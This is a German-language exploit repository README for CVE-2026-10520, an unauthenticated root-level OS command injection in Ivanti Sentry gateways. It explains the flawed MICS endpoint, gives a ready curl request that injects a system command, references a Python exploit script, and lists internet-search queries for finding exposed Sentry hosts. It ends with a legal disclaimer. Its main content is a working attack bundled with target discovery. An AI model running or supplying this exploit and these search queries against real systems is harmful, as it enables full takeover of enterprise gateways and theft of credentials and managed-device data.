
Root-Level RCE durch OS-Befehlseinschleusung in Ivanti Sentry
Ivanti Sentry (ehemals MobileIron Sentry) ist ein Enterprise-Sicherheits-Gateway, das den Datenverkehr zwischen mobilen Geräten und Backend-Ressourcen des Unternehmens vermittelt: E-Mail, SharePoint und interne Webanwendungen. Es setzt Mobile Device Management (MDM)-Richtlinien durch, beendet verschlüsselte mobile Sitzungen und stellt zertifikatsbasierte Authentifizierung für Bereitstellungen von Unternehmens-Apps bereit. Sentry-Instanzen sind typischerweise über Port8443 aus dem Internet erreichbar und legen die MICS (Mobile Iron Configuration Service)-Verwaltungs-API offen.
CVE-2026-10520 ist eine nicht authentifizierte OS-Befehlseinschleusung-Schwachstelle, die Ivanti Sentry vor R10.5.2, R10.6.2 und R10.7.1 betrifft (CVSSv3.1: 10 Kritisch, gelistet in CISA KEV). Der Fehler liegt im MICS API-Endpunkt /mics/api/v2/sentry/mics-config/handleMessage, der XML-verpackte Systembefehle über einen URL-kodierten message -Body ohne Authentifizierung oder Eingabevalidierung akzeptiert. Ein Angreifer, der einen anfälligen Endpunkt erreicht, kann beliebige OS-Befehle als ausführen und erhält so die vollständige Kontrolle über den Host – einschließlich entschlüsselter Unternehmensdaten, gespeicherter Anmeldeinformationen und aller verwalteten mobilen Gerätedaten.
# Inject 'id' command via MICS handleMessage endpoint (no authentication required)
curl -sk -X POST "http://example.com:8443/mics/api/v2/sentry/mics-config/handleMessage" \
-H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Connection: close" \
--data-urlencode "message=execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>id</reqandres></commandexec>"
python CVE-2026-10520-X7.py
title:"Ivanti System Manager: Sign In"body="sentry" && body="System Manager" && port="8443", title="Ivanti System Manager: Sign In", icon_hash=="1407597555"http.html:"Ivanti Standalone Sentry System Manager" port:8443 , http.title:Ivanti port:8443, http.html:"Ivanti" http.html:"Sentry" port:8443Dieses Repository und seine Inhalte werden streng nur für legitime Sicherheitsforschung, autorisierte Penetrationstests, Bildung und defensive Zwecke bereitgestellt. Mit dem Zugriff oder der Nutzung dieses Materials erkennen Sie die volle Verantwortung dafür an, dass Ihre Aktivitäten allen geltenden Gesetzen entsprechen und dass Sie die ordnungsgemäße Genehmigung eingeholt haben, bevor Sie diese Techniken an einem System testen oder anwenden, das nicht Ihr Eigentum ist.
Die Autoren und Betreuer dieses Projekts übernehmen keinerlei Haftung für Schäden, rechtliche Konsequenzen oder Missbrauch, die aus der Anwendung dieser Informationen resultieren. Jegliche Nutzung für unbefugten Zugriff, böswillige Aktivitäten oder illegale Zwecke ist ausdrücklich untersagt und wird nicht unterstützt.
Verwenden Sie es verantwortungsvoll. Bleiben Sie legal. Testen Sie nur das, was Ihnen gehört oder für dessen Test Sie eine ausdrückliche schriftliche Genehmigung haben.
SCT-PL